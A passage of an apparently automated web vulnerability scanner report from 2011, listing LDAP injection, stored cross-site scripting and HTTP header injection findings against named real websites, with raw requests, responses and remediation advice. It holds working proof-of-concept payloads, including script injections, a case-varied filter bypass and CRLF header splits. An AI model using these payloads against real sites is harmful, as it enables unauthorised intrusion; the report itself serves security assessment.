Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:14:02 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 65
Content-Type: text/xml

<?xml version="1.0" encoding="ISO-8859-1"?>
<markers>
</markers>

2. LDAP injection  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hbccards.com
Path:   /ordernow.asp

Issue detail

The X-Mapping-ofcbhgem cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the X-Mapping-ofcbhgem cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /ordernow.asp HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=*)(sn=*; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.1.10.1301493176

Response 1

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:54:29 GMT
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
Content-Length: 26877
Set-Cookie: ASPSESSIONIDASCQDSAS=EPKLECJBDJONHADGAAFPJNJJ; path=/
Set-Cookie: X-Mapping-ofcbhgem=87F600579E92D94B86F73C50B28A9011; path=/



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" content="GRCE6xM3xZdXlLcKcRFjxCaVnk0e2bEm68tZ64H5LQE=" >
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Order Hbc Corporate Gift Cards </title>

<!-- IE6 Fix Attempt -->

<!--[if IE 6]>
<style>
.menu {display:block; width:990px !important; }
#left_side{margin-top:0px !important; }
#inside_right{margin-top:0px !important; width:590px !important; float:right !important; clear:none !important; z-index:1 !important;}
#maincontainer{z-index:0 !important; }


input {width:250px !important;}
.createprofile_line {width:590px !important; float:left !important; clear:both !important; }
.createprofile_formside {width:260px !important; float:left !important; clear:none !important; }
.checkbox{width:15px !important; }
form #aform select{width: 250px !important; }

</style>
<![endif]-->

<!--[if IE]>
<style>
#navigation_minor_1 {padding-top:3px !important; padding-bottom:3px !important;}
#navigation_minor_2{padding-top:3px !important; padding-bottom:3px !important;}
</style>
<![endif]-->

<!--[if gt IE 7]>
<style>
#navigation_minor_1 {padding-top:6px !important; }
#navigation_minor_2{padding-top:6px !important; }
</style>
<![endif]-->


<link rel="stylesheet" href="css/hbc.css" type="text/css" />
<link rel="stylesheet" href="css/sifr.css" type="text/css" />

<script src="js/sifr.js" type="text/javascript"></script>
<script src="js/sifr-config.js" type="text/javascript"></script>

<!-- form validators -->

<link href="css/lytebox.css" rel="stylesheet" type="text/css" />
<SCRIPT TYPE="text/javascript" src=formval.js></SCRIPT>
<sc
...[SNIP]...

Request 2

GET /ordernow.asp HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=*)!(sn=*; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.1.10.1301493176

Response 2

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:54:32 GMT
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
Content-Length: 26877
Set-Cookie: X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; path=/



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1" content="GRCE6xM3xZdXlLcKcRFjxCaVnk0e2bEm68tZ64H5LQE=" >
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<title>Order Hbc Corporate Gift Cards </title>

<!-- IE6 Fix Attempt -->

<!--[if IE 6]>
<style>
.menu {display:block; width:990px !important; }
#left_side{margin-top:0px !important; }
#inside_right{margin-top:0px !important; width:590px !important; float:right !important; clear:none !important; z-index:1 !important;}
#maincontainer{z-index:0 !important; }


input {width:250px !important;}
.createprofile_line {width:590px !important; float:left !important; clear:both !important; }
.createprofile_formside {width:260px !important; float:left !important; clear:none !important; }
.checkbox{width:15px !important; }
form #aform select{width: 250px !important; }

</style>
<![endif]-->

<!--[if IE]>
<style>
#navigation_minor_1 {padding-top:3px !important; padding-bottom:3px !important;}
#navigation_minor_2{padding-top:3px !important; padding-bottom:3px !important;}
</style>
<![endif]-->

<!--[if gt IE 7]>
<style>
#navigation_minor_1 {padding-top:6px !important; }
#navigation_minor_2{padding-top:6px !important; }
</style>
<![endif]-->


<link rel="stylesheet" href="css/hbc.css" type="text/css" />
<link rel="stylesheet" href="css/sifr.css" type="text/css" />

<script src="js/sifr.js" type="text/javascript"></script>
<script src="js/sifr-config.js" type="text/javascript"></script>

<!-- form validators -->

<link href="css/lytebox.css" rel="stylesheet" type="text/css" />
<SCRIPT TYPE="text/javascript" src=formval.js></SCRIPT>
<script type="text/javascript" language="javascript" src="js/lytebox.j
...[SNIP]...

3. Cross-site scripting (stored)  previous  next
There are 2 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach targe users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://learn.shavlik.com/shavlik/index.cfm [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/index.cfm

Issue detail

The value of the h request parameter submitted to the URL /shavlik/index.cfm is copied into an HTML comment at the URL /shavlik/index.cfm. The payload 78a5a--><script>alert(1)</script>c5257cb7950 was submitted in the h parameter. This input was returned unmodified in a subsequent request for the URL /shavlik/index.cfm.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request 1

GET /shavlik/index.cfm?m=1009&pg=697&h=78a5a--><script>alert(1)</script>c5257cb7950&hp=70 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Request 2

GET /shavlik/index.cfm?m=1009&pg=697&h=&hp=69 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=610666; CFTOKEN=95679479; __utmz=202100691.1300711269.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=202100691.944756920.1300711269.1300711269.1300711269.1

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 21:02:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


                                                                       
...[SNIP]...
<!-- 78a5a--><script>alert(1)</script>c5257cb7950|697 -- -->
...[SNIP]...

3.2. http://order.1and1.com/xml/order/Home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Home is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Home. The payload ea665</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>c100d99cab9 was submitted in the REST URL parameter 3. This input was returned as ea665</ScRiPt ><ScRiPt>alert(1)</ScRiPt>c100d99cab9 in a subsequent request for the URL /xml/order/Home.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Homeea665</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>c100d99cab9;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10
If-None-Match: b893ed23e93e100ddf8d3139f7f81ff4

Request 2

GET /xml/order/Home;jsessionid=B1729773B2E0C115D59680FE3F90BB02.TCpfix141a?__reuse=1301085812313 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=; emos1und1d1_jcsid=AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1:AAABLu7Cx_wZVGEkt*DMxXkpVLopiumS:1301085865980; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:4:AAABLu7Cx_zt8xXxYBlocQB77**YqU*t:1301085865980:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 21:08:59 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=DYlcnQUI4YWFhW25kazFpYzAiLGVYUipBNC4tMS4uLSstKygoKyokJyseIB8eG0AuWmZodi4wK1s0Xm0zJicjIicjISQiHCQbMTpyczkvNWVuNCcoJCQiKSUnHx8fHBw=; Expires=Thu, 13-Apr-2079 00:23:06 GMT; Path=/
ETag: 5a3e49c368168e21af680e510fa8e1df
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36436


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
3B2E0C115D59680FE3F90BB02.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Home";UNOUNO.params.lastpage="Homeea665</ScRiPt ><ScRiPt>alert(1)</ScRiPt>c100d99cab9";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...

4. HTTP header injection  previous  next
There are 10 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://ad.doubleclick.net/ad/huffpost.boomerangpixel/bingmodule [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/huffpost.boomerangpixel/bingmodule

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6c394%0d%0a997748dc239 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6c394%0d%0a997748dc239/huffpost.boomerangpixel/bingmodule;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;load_mode=inline;page_type=bpage;pos=boomerang;hot=fb;hot=tw;u=1x1%7Cbpage%7Cboomerang%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7C%7C840995%7C%7C%7C%7C;dcove=r;sz=1x1;tile=4;ord=5299499505? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6c394
997748dc239
/huffpost.boomerangpixel/bingmodule;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-:
Date: Sat, 26 Mar 2011 20:36:28 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 12a6e%0d%0a3cb4ffd24b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /12a6e%0d%0a3cb4ffd24b0/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=;ord=403758047? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/12a6e
3cb4ffd24b0
/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Sat, 26 Mar 2011 13:14:51 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.3. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15f52%0d%0a4fdade80305 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /15f52%0d%0a4fdade80305/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/15f52
4fdade80305
/N5956.Google/B3941858.12;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Fri, 25 Mar 2011 19:19:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.4. http://ad.doubleclick.net/adi/huffpost.politics/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/huffpost.politics/news

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 26fba%0d%0a2a7290e692e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /26fba%0d%0a2a7290e692e/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;qcs=677;qcs=676;qcs=666;qcs=665;qcs=660;qcs=657;;plat=win;br=ch;bv=10;subbv=0;load_mode=inline;page_type=bpage;pos=leaderboard_top;hot=fb;hot=tw;u=728x90%7Cbpage%7Cleaderboard_top%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7CD,T,2687,2685,2402,1910,1908,1905,1592,683,682,680,679,678,677,676,666,665,660,657%7C840995%7C%7C%7C;sz=728x90;tile=1;ord=20736431? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/26fba
2a7290e692e
